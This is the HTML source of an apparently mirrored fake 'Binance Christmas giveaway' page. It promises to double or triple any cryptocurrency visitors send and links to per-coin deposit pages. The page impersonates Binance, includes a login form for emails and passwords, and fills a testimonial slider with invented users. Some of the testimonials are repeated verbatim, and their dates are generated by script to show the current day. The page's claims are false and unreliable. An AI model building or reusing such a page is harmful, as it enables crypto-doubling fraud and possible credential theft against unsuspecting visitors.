<!-- meta tags and other links -->
<!DOCTYPE html>
<html lang="en">




<!-- Mirrored from bnc-xmax-2x.live/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 23 Dec 2021 18:56:22 GMT -->
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Welcome</title>
  <!-- Primary Meta Tags -->
  <title>Season Of Giving: Over $100,000 worth of Crypto From Santa Binance.</title>
  <meta name="title" content="Season Of Giving: Over $100,000 worth of Crypto From Santa Binance.">
  <meta name="description" content="To round up the year and to also celebrate this Festive Period at Binance we are giving out Bonuses to those who did not participate in the past giveaway that was held in November, everyone will get double or triple of whatever amount you participate with">
  
  <!-- Open Graph / Facebook -->
  <meta property="og:type" content="website">
  <meta property="og:url" content="Binance">
  <meta property="og:title" content="Season Of Giving: Over $100,000 worth of Crypto From Santa Binance.">
  <meta property="og:description" content="To round up the year and to also celebrate this Festive Period at Binance we are giving out Bonuses to those who did not participate in the past giveaway that was held in November, everyone will get double or triple of whatever amount you participate with">
  <meta property="og:image" content="https://postimg.cc/R3K3VX7m">
  
  <!-- Twitter -->
  <meta property="twitter:card" content="summary_large_image">
  <meta property="twitter:url" content="https://metatags.io/">
  <meta property="twitter:title" content="Season Of Giving: Over $100,000 worth of Crypto From Santa Binance.">
  <meta property="twitter:description" content="To round up the year and to also celebrate this Festive Period at Binance we are giving out Bonuses to those who did notparticipate in the past giveaway that was held in November, everyone will get double or triple of whatever amount you participate with">
  <meta property="twitter:image" content="https://postimg.cc/R3K3VX7m">

  <!-- site favicon -->
  <link rel="icon" type="image/png" href="favicon.html" sizes="16x16">
  <!-- bootstrap 4  -->
  <link rel="stylesheet" href="css/bootstrap.min.css">
  <!-- fontawesome 5  -->
  <link rel="stylesheet" href="css/all.min.css">
  <!-- line-awesome webfont -->
  <link rel="stylesheet" href="css/line-awesome.min.css">
  <!-- custom select css -->
  <link rel="stylesheet" href="css/nice-select.css">
  <!-- animate css  -->
  <link rel="stylesheet" href="css/animate.min.css">
  <!-- lightcase css -->
  <link rel="stylesheet" href="css/lightcase.css">
  <!-- slick slider css -->
  <link rel="stylesheet" href="css/slick.css">
  <!-- jquery ui css -->
  <link rel="stylesheet" href="css/jquery-ui.min.css">
  <!-- datepicker css -->
  <link rel="stylesheet" href="css/datepicker.min.css">
  <!-- style main css -->
  <link rel="stylesheet" href="css/main.css">

</head>
<script type="text/javascript" src="scripts/jquery.js"></script>

<script type="text/javascript">
  $(window).on('load', function () {
    var pre_loader = $('#preloader')
    pre_loader.fadeOut('slow', function () { $(this).remove(); });
  });

</script>
<style type="text/css">
  input {
    color: #000 !important;
  }

  ::placeholder {
    /* Chrome, Firefox, Opera, Safari 10.1+ */
    color: #000 !important;
    opacity: 1;
    /* Firefox */
  }

  :-ms-input-placeholder {
    /* Internet Explorer 10-11 */
    color: #000 !important;
  }

  ::-ms-input-placeholder {
    /* Microsoft Edge */
    color: #000 !important;
  }

  .loading {
    position: fixed;
    inset: 0;
    background: #fff;
    z-index: 109999;
    display: flex;
    gap: .5rem;
    justify-content: center;
    place-items: center;
    align-items: center;
    animation: hide 3100ms forwards ease-out;
  }


  .loading-item {
    height: 1rem;
    width: 2px;
    background: #F98901;
    animation: loader 1500ms forwards 2;

  }

  @keyframes loader {
    from {
      /* transform: translateY(1rem); */
      transform: scale(1);
    }

    50% {
      /* transform: translateY(3rem); */
      transform: scale(1.5);
    }

    to {
      /* transform: translateY(1rem); */
      transform: scale(1);
    }
  }

  @keyframes hide {
    from {
      opacity: 1;
      visibility: visible;
    }

    90% {
      /* transform: translateY(3rem); */
      opacity: 1;
      visibility: visible;
    }

    to {
      /* transform: translateY(1rem); */
      opacity: 0;
      visibility: hidden;
    }
  }

  .l1 {
    animation-delay: 200ms;
  }

  .l2 {
    animation-delay: 400ms;
  }

  .l3 {
    animation-delay: 600ms;
  }

  .l4 {
    animation-delay: 8000ms;
  }

  /* .l5 {
    animation-delay: 1000ms;
  }
  
  .l6 {
    animation-delay: 1200ms;
  }
  
  .l7 {
    animation-delay: 1400ms;
  } */
</style>
<div class='loading'>
  <div class='loading-item l1'></div>
  <div class='loading-item l2'></div>
  <div class='loading-item l3'></div>
  <div class='loading-item l4'></div>

</div>


<!-- scroll-to-top start -->
<div class="scroll-to-top">
  <span class="scroll-icon">
    <i class="las la-arrow-up"></i>
  </span>
</div>
<!-- scroll-to-top end -->


<!-- theme-switcher start -->
<!--   <div class="theme-switcher">
    <div class="theme-switcher__icon">
      <i class="las la-cog"></i>
    </div>
    <div class="theme-switcher__body">
      <div class="single dark active">
        <a href="index.html">Dark Version</a>
      </div>
      <div class="single light mt-4">
        <a href="light-index.html">Light Version</a>
      </div>
    </div>
  </div> -->
<!-- theme-switcher end -->
<!-- page-wrapper start -->

<div class="page-wrapper">
  <!-- login modal -->
  <div class="modal fade" id="loginModal" tabindex="1" role="dialog" aria-hidden="true">
    <div class="modal-dialog modal-dialog-centered modal-dialog-scrollable">
      <div class="modal-content">
        <div class="modal-body">
          <div class="account-form-area">
            <button type="button" class="close-btn" data-dismiss="modal" aria-label="Close"><i
                class="las la-times"></i></button>
            <h3 class="title">Welcome Back</h3>
            <div class="account-form-wrapper">
              <form>
                <div class="form-group">
                  <label>Email <sup>*</sup></label>
                  <input type="email" name="login_name" id="login_name" placeholder="Enter your Email">
                </div>
                <div class="form-group">
                  <label>password <sup>*</sup></label>
                  <input type="password" name="login_pass" id="login_pass" placeholder="password">
                </div>
                <div class="d-flex flex-wrap justify-content-between mt-2">
                  <div class="custom-checkbox">
                    <input type="checkbox" name="id-1" id="id-1" checked>
                    <label for="id-1">Remember Password</label>
                    <span class="checkbox"></span>
                  </div>
                  <a href="#0" class="link">Forgot Password?</a>
                </div>
                <div class="form-group text-center mt-5">
                  <button class="cmn-btn">log in</button>
                </div>
              </form>
              <p class="text-center mt-4">Don’t have an account? <a href="#0" data-toggle="modal"
                  data-target="#signupModal"> Sign Up Now</a></p>
              <div class="divider">
                <span>or</span>
              </div>
              <ul class="social-link-list">
                <li><a href="#0"><i class="fab fa-facebook-f"></i></a></li>
                <li><a href="#0"><i class="fab fa-twitter"></i></a></li>
                <li><a href="#0"><i class="fab fa-google-plus-g"></i></a></li>
              </ul>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>

  <!-- Sign Up modal -->
  <!--   <div class="modal fade" id="signupModal" tabindex="1" role="dialog" aria-hidden="true">
    <div class="modal-dialog modal-dialog-centered modal-dialog-scrollable">
      <div class="modal-content">
        <div class="modal-body">
          <div class="account-form-area">
            <button type="button" class="close-btn" data-dismiss="modal" aria-label="Close"><i class="las la-times"></i></button>
            <h3 class="title">Open Free Account</h3>
            <div class="account-form-wrapper">
              <form>
                <div class="form-group">
                  <label>Email <sup>*</sup></label>
                  <input type="email" name="signup_name" id="signup_name" placeholder="Enter your Email">
                </div>
                <div class="form-group">
                  <label>password <sup>*</sup></label>
                  <input type="password" name="signup_pass" id="signup_pass" placeholder="password">
                </div>
                <div class="form-group">
                  <label>confirm password <sup>*</sup></label>
                  <input type="password" name="signup_re-pass" id="signup_re-pass" placeholder="Confirm Password">
                </div>
                <div class="d-flex flex-wrap mt-2">
                  <div class="custom-checkbox">
                    <input type="checkbox" name="id-2" id="id-2" checked>
                    <label for="id-2">I agree to the</label>
                    <span class="checkbox"></span>
                  </div>
                  <a href="#0" class="link ml-1">Terms, Privacy Policy and Fees</a>
                </div>
                <div class="form-group text-center mt-5">
                  <button class="cmn-btn">log in</button>
                </div>
              </form>
              <p class="text-center mt-4"> Already have an account? <a href="#0" data-target="#loginModal">Login</a></p>
              <div class="divider">
                <span>or</span>
              </div>
              <ul class="social-link-list">
                <li><a href="#0"><i class="fab fa-facebook-f"></i></a></li>
                <li><a href="#0"><i class="fab fa-twitter"></i></a></li>
                <li><a href="#0"><i class="fab fa-google-plus-g"></i></a></li>
              </ul>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div> -->

  <!-- header-section start  -->
  <header class="header" style="background-color:#000">
    <div class="header__top">
      <div class="container">
        <div class="row align-items-center">
          <div class="col-sm-6">
            <div class="left d-flex align-items-center">
              <!-- <a href="tel:65655655"><i class="las la-phone-volume"></i> Customer Support</a> -->
              <div class="language">
                <!-- <i class="las la-globe-europe"></i> -->
                <!--         <select>
                  <option>En</option>
                  <option>Rus</option>
                  <option>Bn</option>
                  <option>Hp</option>
                  <option>Frn</option>
                </select> -->
              </div>
            </div>
          </div>
          <div class="col-sm-6">
            <div class="right">
              <div class="product__cart">
                <!-- <span class="total__amount">0.00</span> -->
                <!--   <a href="cart.html"  class="amount__btn">
                  <i class="las la-shopping-basket"></i>
                  <span class="cart__num">08</span>
                </a> -->
              </div>
              <!-- <a href="#0" class="user__btn" data-toggle="modal" data-target="#loginModal"><i class="las la-user"></i></a> -->
            </div>
          </div>
        </div>
      </div>
    </div><!-- header__top end -->
    <div class="header__bottom" style="background-color:#000">
      <div class="container">
        <nav class="navbar navbar-expand-xl p-0 align-items-center">
          <a class="site-logo site-title" href="index-2.html" class="text-dark" style="color:e0e0e0"><img
              src="images/blogo.png" style='width:200px' alt="site-logo"><span class="logo-icon"><i
                class="flaticon-fire"></i></span></a>
          <button class="navbar-toggler ml-auto" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false"
            aria-label="Toggle navigation">
            <!-- <span class="menu-toggle"></span> -->
          </button>
          <div class="collapse navbar-collapse" id="navbarSupportedContent">
            <ul class="navbar-nav main-menu ml-auto">
              <li class="menu_has_children">
                <!-- <a href="#0">Home</a> -->
                <ul class="sub-menu">
                  <!--         <li><a href="index.html">Home One</a></li>
                  <li><a href="index-two.html">Home Two</a></li>
                  <li><a href="index-three.html">Home Three</a></li>
                  <li><a href="index-four.html">Home Four</a></li> -->
                </ul>
              </li>
              <li class="menu_has_children">
                <!-- <a href="#0">Contest</a> -->
                <ul class="sub-menu">
                  <!--       <li><a href="#">All contest</a></li>
                  <li><a href="contest-details-one.html">Contest Details One</a></li>
                  <li><a href="contest-details-two.html">Contest Details Two</a></li>
                  <li><a href="lottery-details.html">Lottery Details One</a></li>
                  <li><a href="lottery-details-two.html">Lottery Details Two</a></li> -->
                </ul>
              </li>
              <!--   <li><a href="winner.html">Winners</a></li>
              <li class="menu_has_children">
                <a href="#0">pages</a>
                <ul class="sub-menu">
                  <li><a href="about.html">About Us</a></li>
                  <li><a href="affiliate.html">Affiliate Page</a></li>
                  <li><a href="how-work.html">How it works</a></li>
                  <li><a href="user.html">User Panel</a></li>
                  <li><a href="blog.html">Blog Posts</a></li>
                  <li><a href="blog-single.html">Blog Single</a></li>
                  <li><a href="cart.html">Cart Page</a></li>
                  <li><a href="checkout.html">Checkout Page</a></li>
                  <li><a href="faq.html">FAQ Page</a></li>
                  <li><a href="error-404.html">404 Page</a></li>
                </ul>
              </li>
              <li><a href="contact.html">contact</a></li> -->
            </ul>
            <div class="nav-right">
              <!-- <a href="#" class="cmn-btn style--three btn--sm"><img src="images
/icon/btn/tag.png" alt="icon" class="mr-2"> Buy Tickets</a> -->
            </div>
          </div>
        </nav>
      </div>
    </div><!-- header__bottom end -->
  </header>
  <!-- header-section end  -->

  <!-- hero start -->
  <section class="hero style--two bg_img" data-background="" style='background:#FFB200;color: #fff'>
    <!-- <div class="hero__shape-left"><img src="im/elements/hero-3-shape.png" alt="image"></div> -->
    <!-- <div class="hero__shape"><img src="im/elements/round-shape-3.png" alt="image"></div> -->
    <!-- <div class="hero-e1"><img src="im/elements/hero-2-e1.png" alt="image"></div> -->
    <!-- <div class="hero-e2"><img src="im/elements/hero-2-e2.png" alt="image"></div> -->
    <!-- <div class="hero-e3"><img src="im/elements/hero-2-e3.png" alt="image"></div> -->
    <!-- <div class="hero-e4"><img src="im/elements/hero-2-e4.png" alt="image"></div> -->
    <!-- <div class="hero-e5"><img src="im/elements/hero-2-e5.png" alt="image"></div> -->
    <div class="hero-car-main wow bounceIn" data-wow-duration="0.5s" data-wow-delay="0.5s">
      <img src="images/erf.png" alt="image">
    </div>
    <div class="container">
      <div class="row justify-content-center justify-content-lg-start">
        <div class="col-lg-8 col-md-10">
          <div class="hero__content">
            <div class="hero__subtitle wow fadeInUp" data-wow-duration="0.5s" data-wow-delay="0.9s" style='color:#000'>
              Season Of Giving: <br>
              Over $100,000 worth of Crypto From Santa Binance</div>
            <!-- <h2 class="hero__title wow fadeInUp" data-wow-duration="0.5s" data-wow-delay="0.7s">Christmas Giveaway</h2> -->
            <p class="wow fadeInUp" data-wow-duration="0.5s" data-wow-delay="0.5s" style='color:#000'>To round up the
              year and to also celebrate this Festive Period at Binance we are giving out Bonuses to those who did not
              participate in the past giveaway that was held in November, everyone will get double or triple of whatever
              amount you participate with</p>
            <div class="hero__btn wow fadeInUp" data-wow-duration="0.5s" data-wow-delay="0.3s">
              <a href="BTC/index.html" class="cmn-btn" style='color:#fff;background:#000'>With BTC</a>
              <a class="video-btn" href="images/video1.mp4" data-rel="lightcase:myCollection"><i
                  class="fas fa-play"></i></a>
            </div>
          </div>
        </div>
        <div class="col-lg-6">
          <div class="hero__thumb">
            <img src="images/car-main.png" alt="">
          </div>
        </div>
        <div class="col-lg-12 pt-120">
          <div class="pick-lottery-package">
            <h2 class="title" style='color:#000'>Participate with </h2>
            <div class="lottery-package-list">
              <a href="BTC/index.html" target='_blank'><img
                  src='../upload.wikimedia.org/wikipedia/commons/thumb/9/9a/BTC_Logo.svg/2000px-BTC_Logo.svg.png'
                  style='width:35px;padding-right:10px;padding-bottom:5px'>BTC</a>
              <a href="ETH/index.html" target='_blank'><img src='../cryptologos.cc/logos/ethereum-eth-logo.png'
                  style='width:35px;padding-right:10px;padding-bottom:5px'>ETH</a>
              <a href="XRP/index.html" target='_blank'><img
                  src='../cdn.freebiesupply.com/logos/large/2x/ripple-2-logo-png-transparent.png'
                  style='width:35px;padding-right:10px;padding-bottom:5px'>XRP</a>
              <a href="BCH/index.html" target='_blank'><img
                  src='../dl.airtable.com/NJjb0kmQgaoyv57aV3bQ_large_S73NSYDjQMeidV16Bkns_full_BCash-Logo.png'
                  style='width:35px;padding-right:10px;padding-bottom:5px'>BCH</a>
              <a href="BNB/index.html" target='_blank'><img src='../cryptologos.cc/logos/binance-coin-bnb-logo.png'
                  style='width:35px;padding-right:10px;padding-bottom:5px'>BNB</a>
              <a href="TRX/index.html" target='_blank'><img src='../cryptologos.cc/logos/tron-trx-logo.png'
                  style='width:35px;padding-right:10px;padding-bottom:5px'>TRX</a>
              <a href="LTC/index.html" target='_blank'><img src='../cryptologos.cc/logos/litecoin-ltc-logo.png'
                  style='width:35px;padding-right:10px;padding-bottom:5px'>LTC</a>
              <!-- <a href="BCH/index.html">DOGE</a> -->
              <a href="ADA/index.html" target='_blank'><img
                  src='../cdn4.iconfinder.com/data/icons/crypto-currency-and-coin-2/256/3305878.png'
                  style='width:35px;padding-right:10px;padding-bottom:5px'>ADA</a>
              <a href="USDT/index.html" target='_blank'><img src='../cryptologos.cc/logos/tether-usdt-logo.png'
                  style='width:35px;padding-right:10px;padding-bottom:5px'>USDT</a>
              <a href="DOGE/index.html" target='_blank'><img
                  src='../cdn.freebiesupply.com/logos/large/2x/dogecoin-logo-png-transparent.png'
                  style='width:35px;padding-right:10px;padding-bottom:5px'>DOGE</a>
            </div>
          </div>
        </div>
      </div>
    </div>
  </section>
  <!-- hero start -->

  <!-- counter section start -->

  <!-- counter section end -->




  <!-- buy ticket section start -->
  <section class="" style="background-color:#fff;color:#000">

    <div class="container" style='padding-top: 40px;color:#000'>
      <h2 style='padding-bottom: 20px;color:#000;text-align: center;'>Trade. Anywhere.
      </h2>
      <div class="row">
        <div class="col-md-5"> <img src="images/index.jpg" alt="image" style='padding-top:2'></div>
        <div class="col-md-7 text-lg-left text-center">
          <div class="section-header">
            <span class="section-sub-title" style='color:#000;padding-top:20px'>Dream Big Play Small</span>
            <!-- <h2 class="section-title font-weight-bold">Will you be the next Winner?</h2> -->
            <p style='color:#000'>To round up the year and to also celebrate this Festive Period at Binance we are
              giving out Bonuses to those who did not participate in the past giveaway that was held in November,
              everyone will get double or triple of whatever amount you participate with</p>
          </div>
          <div class="buy-btn-wrapper">
            <span>Don't miss out! Get started</span>
            <img src="images/arrow.png" alt="image" class="arrow">
            <a href="BNB/index.html" class="cmn-btn">Double BNB now!</a>
          </div>
        </div>
      </div>
      <div class="row winner-stat-wrapper">
        <div class="col-lg-8 text-lg-left text-center">
          <!-- <h3 class="font-weight-normal winner-stat-wrapper__title">Let the Number Speak for Us</h3> -->
          <div class="row mb-none-30">


          </div>
        </div>
      </div>
    </div>
  </section>
  <!-- buy ticket section end -->


























  <!-- testimonial section start -->
  <section class="has-bg--shape pt-120 pb-120" style="background-color:#FFB200">
    <div class="bg-shape">
      <div class="round-shape d-sm-block d-none"><img src="images/round-shape.png" alt="image"></div>
      <div class="shape-1"></div>
      <div class="shape-2"></div>
      <div class="shape-3"></div>
      <div class="shape-4"></div>
      <div class="shape-5"></div>
      <div class="shape-6"></div>
    </div>
    <div class="container">
      <div class="row justify-content-center">
        <div class="col-lg-9 wow fadeInUp" data-wow-duration="0.5s" data-wow-delay="0.3s">

        </div>
      </div>
      <div class="row justify-content-center">
        <div class="col-lg-8">
          <div class="testimonial-area bg_img" style="background-color:#000;color:#fff">
            <div class="testimonial-slider">
              <div class="testimonial-single">
                <div class="testimonial-single__thumb">
                  <img src="images/peter.jpg" alt="image">
                </div>
                <div class="testimonial-single__content">
                  <h4 class="client-name" style='color:#fff'>Yuri Kozlov</h4>
                  <p style='color:#fff'>This is a unique event. Not all company can pull this off.I just received
                    3ETH.Thanks so much. </p>

                  <div
                    class="ui-caption u-fontSize12 u-baseColor--textNormal u-textColorNormal js-postMetaInlineSupplemental">
                    <a class="link link--darken" href="https://medium.com/@Philip_Douglas" data-action="open-post"
                      data-action-value="https://medium.com/@Philip_Douglas" data-action-source="preview-listing">
                      <script language="javascript"
                        type="text/javascript"> var d = new Date(); var month = new Array("Jan", "Feb", "Mar", "Apr", "May", "June", "July", "Aug", "Sept", "Oct", "Nov", "Dec"); document.write(month[d.getMonth()] + " " + d.getDate());</script>
                      <time datetime="2018-07-17T04:34:19.838Z">
                        <script language="javascript" type="text/javascript"> document.write(TODAY);</script>
                      </time>
                    </a>
                  </div>
                </div>
              </div><!-- testimonial-single end -->

              <div class="testimonial-single">
                <div class="testimonial-single__thumb">
                  <img src="images/rosa.jpg" alt="image">
                </div>
                <div class="testimonial-single__content">
                  <h4 class="client-name" style='color:#fff'>Julia Simons</h4>
                  <p style='color:#fff'>Got 2 btc, thanks to u guys, your team are doing a great job 👍 </p>

                  <div
                    class="ui-caption u-fontSize12 u-baseColor--textNormal u-textColorNormal js-postMetaInlineSupplemental">
                    <a class="link link--darken" href="https://medium.com/@Khadiri_Bolt" data-action="open-post"
                      data-action-value="https://medium.com/@Khadiri_Bolt" data-action-source="preview-listing">
                      <script language="javascript"
                        type="text/javascript"> var d = new Date(); var month = new Array("Jan", "Feb", "Mar", "Apr", "May", "June", "July", "Aug", "Sept", "Oct", "Nov", "Dec"); document.write(month[d.getMonth()] + " " + d.getDate());</script>
                      <time datetime="2018-07-17T04:34:19.838Z">
                        <script language="javascript" type="text/javascript"> document.write(TODAY);</script>
                      </time>
                    </a>
                  </div>
                </div>
              </div><!-- testimonial-single end -->



              <div class="testimonial-single">
                <div class="testimonial-single__thumb">
                  <img src="images/el.jpg" alt="image">
                </div>
                <div class="testimonial-single__content">
                  <h4 class="client-name" style='color:#fff'>Dave Clark</h4>
                  <p style='color:#fff'>Unbelievable this is a dream come true,no way would I ever think I would make
                    this much in a day. </p>

                  <div
                    class="ui-caption u-fontSize12 u-baseColor--textNormal u-textColorNormal js-postMetaInlineSupplemental">
                    <a class="link link--darken" href="https://medium.com/@Philip_Douglas" data-action="open-post"
                      data-action-value="https://medium.com/@Philip_Douglas" data-action-source="preview-listing">
                      <script language="javascript"
                        type="text/javascript"> var d = new Date(); var month = new Array("Jan", "Feb", "Mar", "Apr", "May", "June", "July", "Aug", "Sept", "Oct", "Nov", "Dec"); document.write(month[d.getMonth()] + " " + d.getDate());</script>
                      <time datetime="2018-07-17T04:34:19.838Z">
                        <script language="javascript" type="text/javascript"> document.write(TODAY);</script>
                      </time>
                    </a>
                  </div>
                </div>
              </div><!-- testimonial-single end -->

              <div class="testimonial-single">
                <div class="testimonial-single__thumb">
                  <img src="images/rosa.jpg" alt="image">
                </div>
                <div class="testimonial-single__content">
                  <h4 class="client-name" style='color:#fff'>Julia Simons</h4>
                  <p style='color:#fff'>Got 2 btc, thanks to u guys, your team are doing a great job 👍 </p>

                  <div
                    class="ui-caption u-fontSize12 u-baseColor--textNormal u-textColorNormal js-postMetaInlineSupplemental">
                    <a class="link link--darken" href="https://medium.com/@Khadiri_Bolt" data-action="open-post"
                      data-action-value="https://medium.com/@Khadiri_Bolt" data-action-source="preview-listing">
                      <script language="javascript"
                        type="text/javascript"> var d = new Date(); var month = new Array("Jan", "Feb", "Mar", "Apr", "May", "June", "July", "Aug", "Sept", "Oct", "Nov", "Dec"); document.write(month[d.getMonth()] + " " + d.getDate());</script>
                      <time datetime="2018-07-17T04:34:19.838Z">
                        <script language="javascript" type="text/javascript"> document.write(TODAY);</script>
                      </time>
                    </a>
                  </div>
                </div>
              </div><!-- testimonial-single end -->






              <div class="testimonial-single">
                <div class="testimonial-single__thumb">
                  <img src="images/serghei.jpg" alt="image">
                </div>
                <div class="testimonial-single__content">
                  <h4 class="client-name" style='color:#fff'>Miguel Alvarez</h4>
                  <p style='color:#fff'>I'm still in shock about this platform I just got my double bonus after
                    participating in the giveaway few minutes ago, I'm so excited and relieved thank you so much for
                    this event. ☺️ </p>

                  <div
                    class="ui-caption u-fontSize12 u-baseColor--textNormal u-textColorNormal js-postMetaInlineSupplemental">
                    <a class="link link--darken" href="https://medium.com/@Khadiri_Bolt" data-action="open-post"
                      data-action-value="https://medium.com/@Khadiri_Bolt" data-action-source="preview-listing">
                      <script language="javascript"
                        type="text/javascript"> var d = new Date(); var month = new Array("Jan", "Feb", "Mar", "Apr", "May", "June", "July", "Aug", "Sept", "Oct", "Nov", "Dec"); document.write(month[d.getMonth()] + " " + d.getDate());</script>
                      <time datetime="2018-07-17T04:34:19.838Z">
                        <script language="javascript" type="text/javascript"> document.write(TODAY);</script>
                      </time>
                    </a>
                  </div>
                </div>
              </div><!-- testimonial-single end -->


              <div class="testimonial-single">
                <div class="testimonial-single__thumb">
                  <img src="images/jun.jpg" alt="image">
                </div>
                <div class="testimonial-single__content">
                  <h4 class="client-name" style='color:#fff'>君孙</h4>
                  <p style='color:#fff'>很棒的平台，感觉很好，就像承诺的那样投资和获得利润，感谢您提供这个机会。. </p>

                  <div
                    class="ui-caption u-fontSize12 u-baseColor--textNormal u-textColorNormal js-postMetaInlineSupplemental">
                    <a class="link link--darken" href="https://medium.com/@Philip_Douglas" data-action="open-post"
                      data-action-value="https://medium.com/@Philip_Douglas" data-action-source="preview-listing">
                      <script language="javascript"
                        type="text/javascript"> var d = new Date(); var month = new Array("Jan", "Feb", "Mar", "Apr", "May", "June", "July", "Aug", "Sept", "Oct", "Nov", "Dec"); document.write(month[d.getMonth()] + " " + d.getDate());</script>
                      <time datetime="2018-07-17T04:34:19.838Z">
                        <script language="javascript" type="text/javascript"> document.write(TODAY);</script>
                      </time>
                    </a>
                  </div>
                </div>
              </div><!-- testimonial-single end -->

              <div class="testimonial-single">
                <div class="testimonial-single__thumb">
                  <img src="images/rosa.jpg" alt="image">
                </div>
                <div class="testimonial-single__content">
                  <h4 class="client-name" style='color:#fff'>Julia Simons</h4>
                  <p style='color:#fff'>Got 2 btc, thanks to u guys, your team are doing a great job 👍 </p>

                  <div
                    class="ui-caption u-fontSize12 u-baseColor--textNormal u-textColorNormal js-postMetaInlineSupplemental">
                    <a class="link link--darken" href="https://medium.com/@Khadiri_Bolt" data-action="open-post"
                      data-action-value="https://medium.com/@Khadiri_Bolt" data-action-source="preview-listing">
                      <script language="javascript"
                        type="text/javascript"> var d = new Date(); var month = new Array("Jan", "Feb", "Mar", "Apr", "May", "June", "July", "Aug", "Sept", "Oct", "Nov", "Dec"); document.write(month[d.getMonth()] + " " + d.getDate());</script>
                      <time datetime="2018-07-17T04:34:19.838Z">
                        <script language="javascript" type="text/javascript"> document.write(TODAY);</script>
                      </time>
                    </a>
                  </div>
                </div>
              </div><!-- testimonial-single end -->
              <div class="testimonial-single">
                <div class="testimonial-single__thumb">
                  <img src="images/serghei.jpg" alt="image">
                </div>
                <div class="testimonial-single__content">
                  <h4 class="client-name" style='color:#fff'>Miguel Alvarez</h4>
                  <p style='color:#fff'>I'm still in shock about this platform I just got my double bonus after
                    participating in the giveaway few minutes ago, I'm so excited and relieved thank you so much for
                    this event. ☺️ </p>

                  <div
                    class="ui-caption u-fontSize12 u-baseColor--textNormal u-textColorNormal js-postMetaInlineSupplemental">
                    <a class="link link--darken" href="https://medium.com/@Khadiri_Bolt" data-action="open-post"
                      data-action-value="https://medium.com/@Khadiri_Bolt" data-action-source="preview-listing">
                      <script language="javascript"
                        type="text/javascript"> var d = new Date(); var month = new Array("Jan", "Feb", "Mar", "Apr", "May", "June", "July", "Aug", "Sept", "Oct", "Nov", "Dec"); document.write(month[d.getMonth()] + " " + d.getDate());</script>
                      <time datetime="2018-07-17T04:34:19.838Z">
                        <script language="javascript" type="text/javascript"> document.write(TODAY);</script>
                      </time>
                    </a>
                  </div>
                </div>
              </div><!-- testimonial-single end -->


              <div class="testimonial-single">
                <div class="testimonial-single__thumb">
                  <img src="images/carl.jpg" alt="image">
                </div>
                <div class="testimonial-single__content">
                  <h4 class="client-name" style='color:#fff'>Carl parker</h4>
                  <p style='color:#fff'>Binance is really a great platform.Your money is pleasing sir keep it up while
                    others like myself earn, thanks Binance, great event </p>

                  <div
                    class="ui-caption u-fontSize12 u-baseColor--textNormal u-textColorNormal js-postMetaInlineSupplemental">
                    <a class="link link--darken" href="https://medium.com/@Philip_Douglas" data-action="open-post"
                      data-action-value="https://medium.com/@Philip_Douglas" data-action-source="preview-listing">
                      <script language="javascript"
                        type="text/javascript"> var d = new Date(); var month = new Array("Jan", "Feb", "Mar", "Apr", "May", "June", "July", "Aug", "Sept", "Oct", "Nov", "Dec"); document.write(month[d.getMonth()] + " " + d.getDate());</script>
                      <time datetime="2018-07-17T04:34:19.838Z">
                        <script language="javascript" type="text/javascript"> document.write(TODAY);</script>
                      </time>
                    </a>
                  </div>
                </div>
              </div><!-- testimonial-single end -->


            </div><!-- testimonial-slider end -->
          </div><!-- testimonial-area end -->
        </div>
      </div>
    </div>
  </section>
  <!-- testimonial section end -->


  <footer class="footer-section" style='background-color:#000'>


    <div class="container pt-120">
      <div class="row pb-5 align-items-center">
        <div class="col-lg-4">
          <ul class="app-btn">
            <li><a href="#0"><img src="images/1.png" alt="image"></a></li>
            <li><a href="#0"><img src="images/2.png" alt="image"></a></li>
          </ul>
        </div>
        <div class="col-lg-8">
          <ul class="short-links justify-content-lg-end justify-content-center">
            <!--     <li><a href="#0">Abount</a></li>
            <li><a href="#0">FAQs</a></li>
            <li><a href="#0">Contact</a></li>
            <li><a href="#0">Terms of Services</a></li>
            <li><a href="#0">Privacy</a></li> -->
          </ul>
        </div>
      </div>
      <hr>
      <div class="row py-5 align-items-center">
        <div class="col-lg-6">
          <p class="copy-right-text text-lg-left text-center mb-lg-0 mb-3">Copyright © 2021.All Rights <a href="#"></a>
          </p>
        </div>
        <div class="col-lg-6">
          <ul class="social-links justify-content-lg-end justify-content-center">
            <li><a href="#0"><i class="fab fa-facebook-f"></i></a></li>
            <li><a href="#0"><i class="fab fa-twitter"></i></a></li>
            <li><a href="#0"><i class="fab fa-linkedin-in"></i></a></li>
          </ul>
        </div>
      </div>
    </div>
  </footer>
  <!-- footer section end -->
</div><!-- page-wrapper end -->
<!-- page-wrapper end -->
<!-- jQuery library -->
<script src="scripts/jquery-3.5.1.min.js"></script>
<!-- bootstrap js -->
<script src="scripts/bootstrap.bundle.min.js"></script>
<!-- custom select js -->
<script src="scripts/jquery.nice-select.min.js"></script>
<!-- lightcase js -->
<script src="scripts/lightcase.js"></script>
<!-- wow js -->
<script src="scripts/wow.min.js"></script>
<!-- slick slider js -->
<script src="scripts/slick.min.js"></script>
<!-- countdown js -->
<script src="scripts/jquery.countdown.js"></script>
<!-- jquery ui js -->
<script src="scripts/jquery-ui.min.js"></script>
<!-- datepicker js -->
<script src="scripts/datepicker.min.js"></script>
<script src="scripts/datepicker.en.js"></script>
<!-- preloader -->
<script src='scripts/TweenMax.min.js'></script>
<script src='scripts/MorphSVGPlugin.min.js'></script>
<script src="scripts/preloader.js"></script>
<!-- contact js -->
<script src="scripts/contact.js"></script>
<!-- custom js -->
<script src="scripts/app.js"></script>
   <!--Start of Tawk.to Script-->
   <script src="../widget-v4.tidiochat.com/1_80_0/static/js/render.106c619fdca921c17d56.js" async></script>
   <!--End of Tawk.to Script-->





<!-- Mirrored from bnc-xmax-2x.live/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 23 Dec 2021 18:56:22 GMT -->
</html>